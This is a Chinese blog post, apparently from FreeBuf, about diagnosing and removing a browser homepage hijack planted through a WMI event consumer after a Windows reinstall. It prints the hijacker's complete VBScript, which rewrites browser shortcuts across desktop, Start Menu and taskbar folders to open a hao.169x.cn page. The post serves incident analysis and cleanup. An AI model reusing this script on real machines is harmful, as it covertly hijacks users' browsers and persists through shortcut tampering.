流氓至此,我竟无言以对之Chrome 浏览器主页被篡 – 作者:lyjsyqw

0x00事情背景

Windows10更新需谨慎,更新后系统盘文件夹windowsold禁忌误删关键信息。不然就会系统蓝屏,具体如下:

1619349975_608551d77e7ada2f2ec7e.png!small

百度了很多种方法解决蓝屏问题,什么进安全模式、PE模式、自动修复等最终都以失败告终,花费的时间精力等太难了!最终选择了最不愿意选择的办法,重装系统。在重装系统的过程中也是万般艰难,难的不是装系统,难的是不通过大白菜安装。

0x01问题现象

系统安装完成了,但是通过流氓PE安装的系统肯定存在很多可见可不见的问题。目前看到的是通过官网下载的Chrome 浏览器安装之后,打开主页被篡为hao.123、hao.169

1619350010_608551fab3cfc9d841a0d.png!small

1619350021_608552057e27fd08d3fd4.png!small

0x02问题定位

百度很多的解决办法都是治标不治本。

打开浏览器快捷方式,在目标中看到明显的加载篡改网站,也可以重命名快捷方式名字,删除网址后可暂时解决。

1619350046_6085521eb4f7709bf3da1.png!small

通过火绒剑查看程序启动加载的文件

进程名过滤:chrome.exe

1619350072_608552382056e431a322f.png!small

开启监控,打开chrome浏览器

1619350086_6085524617fed972661d5.png!small

通过进程可以发现主程序在启动时就被流氓篡改加载预设值好的文件。

通过主程序跳转到具体的文件。

1619350105_60855259e6f053e9354aa.png!small

这里可以将文件进行提取,自己可以逆向分析,这里比较麻烦,就不操作了。

1619350122_6085526aeff6876aabcd6.png!small

1619350129_6085527162a7150bebf02.png!small

最后通过查阅资料,分析一种比较好的解决办法。

安装WMITools.exe工具,安装完成打开如下:

1619350145_608552812d81892d62e77.png!small

点击✒的图标,弹出的对话框一路OK就行

1619350162_60855292be7d10a622427.png!small

1619350169_608552996754815b820f6.png!small

在右侧栏右键点击ActiveScriptEventConsumper,并开通view instant properties查看属性:

1619350189_608552ad52a90fa819695.png!small

查看Script text内容,可以看到这是一段VBScript代码,攻击目标涵盖了包括Chrome、360、Firefox、搜狗等浏览器有限定主页格式,于是这段脚本还特地修饰了流氓网站的链接。唉,流氓至此,我竟无言以对…….

1619350209_608552c18ec4248081792.png!small

On Error Resume Next:Const link = "http://hao.169x.cn/?v=108":Const link360 = "http://hao.169x.cn/?v=108&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:

1619350233_608552d99c280e1b6f505.png!small

0x03问题解决

需要以管理员身份运行WMI Event Viewer工具,然后按照上述问题定位的方法,然后删除。

1619350254_608552ee38bd5847aed33.png!small

1619350261_608552f50b4a1e6ae39d1.png!small

然后在把桌面图标、任务栏启动项(C:\ProgramData\Microsoft\Windows\Start Menu\Programs)等在目标中删除。

1619350282_6085530aea12284bf876c.png!small

最终,可以摆脱流氓的劫持。

1619350297_608553191241a49092c77.png!small

0x04参考链接

https://www.zhihu.com/question/21883209

链接:https://pan.baidu.com/s/1f7phn0nRskL5RZXG0igfWw

提取码:eta9

来源:freebuf.com 2021-04-25 19:34:06 by: lyjsyqw

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论